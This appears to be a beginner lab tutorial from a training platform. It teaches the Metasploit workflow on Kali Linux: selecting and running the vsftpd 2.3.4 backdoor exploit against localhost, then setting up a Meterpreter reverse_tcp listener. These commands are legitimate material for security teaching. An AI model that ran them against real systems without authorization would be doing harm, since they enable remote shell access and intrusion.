Introduction
In this lab, you will learn the basics of penetration testing using Kali Linux within a controlled environment on the LabEx VM. The focus is on leveraging the powerful Metasploit Framework to identify vulnerabilities, configure payloads, execute exploits, and interact with compromised systems through a Meterpreter session. Designed for beginners, this lab guides you step by step through essential cybersecurity techniques in a safe and structured manner. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to start practicing without needing to manually start or enter the container.
Starting Metasploit Framework
In this first step, you will launch the Metasploit Framework, a key tool for penetration testing in Kali Linux. This step is essential as it sets up the environment for identifying and exploiting vulnerabilities in later steps.
When you open the terminal in the LabEx VM, you will be automatically connected to the Kali Linux container's shell. There is no need to manually start the container or enter the shell; the environment is already configured for you.
Before using Metasploit, you need to ensure it is installed in the Kali Linux container. First, update the package list by typing the following command in the terminal and pressing Enter:
apt update
Next, install the Metasploit Framework. This installation may take a few minutes, so please wait for it to complete.
apt install -y metasploit-framework
Once installed, start the Metasploit console by typing the following command and pressing Enter:
msfconsole
The first time you run this command, it might take a moment to initialize as it sets up the database and loads modules. You will see an ASCII art banner and a prompt similar to this when Metasploit starts:
Metasploit Framework
...
msf6 >
The msf6 > prompt indicates that you are now inside the Metasploit console, ready to interact with the framework. Do not exit the console, as you will use it in the next step to search for and select an exploit.
Searching and Selecting an Exploit
Now that you have started the Metasploit Framework, the next step is to search for and select an exploit. An exploit is a piece of code that takes advantage of a software vulnerability to cause unintended behavior, such as gaining unauthorized access.
Since you are already in the Metasploit console (with the msf6 > prompt), let's search for an exploit related to FTP (File Transfer Protocol), a common service that can have vulnerabilities. Type the following command and press Enter:
search ftp
This command lists exploits and auxiliary modules related to FTP. The output will show a table of matching modules.
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
1 auxiliary/scanner/ftp/ftp_version normal No FTP Version Scanner
2 auxiliary/scanner/ftp/anonymous normal No FTP Anonymous Access Scanner
...
For this lab, we will use the vsftpd_234_backdoor exploit. To select it, use the use command followed by the exploit's name.
use exploit/unix/ftp/vsftpd_234_backdoor
After selecting the exploit, your prompt will change to include the exploit's name, indicating it is now the active module.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
To view detailed information about the selected exploit, including its options and requirements, type the info command.
info
The output provides details such as the platform, architecture, and available targets.
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
You have now successfully selected an exploit. In the next step, you will configure a payload for this exploit.
Note: Labby can not get the operation records in msf shell, the following steps will not be verified.
Configuring the Exploit and Payload
With the exploit selected, you now need to configure its options and review payload behavior. A payload is the code that runs on the target system after an exploit succeeds. In current Metasploit builds, this module often runs with its default behavior and may not accept manual payload selection.
Important: Before setting a payload, it's crucial to check which payloads are compatible with your selected exploit. Use the following command to see all compatible payloads:
show payloads
This command shows payloads compatible with vsftpd_234_backdoor. In some Metasploit versions, cmd/unix/interact appears; in others, it may be missing or treated as invalid.
set payload cmd/unix/interact
If that command returns an error such as The value specified is not valid, continue without setting a payload and keep the module default.
Next, you need to configure the exploit options. The RHOST (Remote Host) option specifies the IP address of the target machine. For this simulation, we will set it to 127.0.0.1.
set RHOST 127.0.0.1
Important Note: For this exploit workflow, you do not need to set LHOST or LPORT before running the exploit.
To verify all the settings, use the show options command.
show options
This displays a table of options for the exploit. Check that RHOST is set correctly.
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Your exploit and payload are now configured and ready for execution in the next step.
Executing the Exploit
Having configured the exploit and payload, you are now ready to execute it. The exploit command instructs Metasploit to launch the attack against the specified target (RHOST).
In your Metasploit console, simply type the following command and press Enter:
exploit
Metasploit will attempt to run the exploit. Since there is no actual vulnerable VSFTPD service running on 127.0.0.1 in this lab environment, the exploit will fail. This is expected and demonstrates the process of launching an attack.
The output will show that Metasploit attempted to connect to the target FTP service but failed because the service is not running:
[-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:21).
[*] Exploit completed, but no session was created.
Note: This exploit workflow does not require starting a reverse-shell listener in advance. If the target were vulnerable and reachable, Metasploit would attempt to open an interactive command session.
The message Exploit completed, but no session was created confirms the failure. In a successful scenario with a vulnerable VSFTPD service, this would establish an interactive command shell session, allowing you to execute commands directly on the target system. This step teaches you the fundamental command for launching an exploit, which is a core part of the penetration testing workflow.
Setting Up a Meterpreter Listener
In this final step, you will learn to set up a listener for a Meterpreter payload. Meterpreter is an advanced, feature-rich payload that provides an interactive shell on the target system. Instead of launching an exploit, you will use the exploit/multi/handler module to listen for incoming connections. This is useful when an exploit is delivered through other means (e.g., a malicious file) and you need to catch the reverse connection.
First, switch to the multi/handler module.
use exploit/multi/handler
Your prompt will change to reflect the new module.
msf6 exploit(multi/handler) >
Next, set a Meterpreter payload. We will use one designed for Linux systems. The payload name linux/x86/meterpreter/reverse_tcp follows a logical structure: <platform>/<architecture>/<type>/<protocol>. It specifies a Linux platform, x86 architecture, a Meterpreter payload type, and a reverse TCP connection protocol.
set payload linux/x86/meterpreter/reverse_tcp
Now, configure the listener options, LHOST and LPORT, just as you did before.
set LHOST 127.0.0.1
Note: You may see a warning message about binding to a loopback address. This is normal when using localhost (127.0.0.1) and can be safely ignored for this lab.
set LPORT 4444
Finally, start the listener using the exploit command.
exploit
Metasploit will start a listener on the specified IP and port, waiting for a Meterpreter session to connect.
[*] Started reverse TCP handler on 127.0.0.1:4444
The console will remain active, waiting for a connection. In a real scenario, if a target machine executed the corresponding Meterpreter payload, a session would be established here. Since no target will connect in this lab, you can stop the listener by pressing Ctrl + C.
To exit the Metasploit console, type exit and press Enter.
Summary
In this lab, you have learned the fundamental steps of penetration testing using Kali Linux and the Metasploit Framework. You started by launching Metasploit, searched for and selected an exploit, reviewed payload compatibility, configured exploit options, and executed the attack in a simulated environment. You also learned how to set up a standalone listener for an advanced Meterpreter payload. These steps provide a practical introduction to the core workflow of identifying vulnerabilities, preparing payloads, and understanding the exploitation process. By following this structured approach, you have gained hands-on experience with essential cybersecurity tools and techniques.
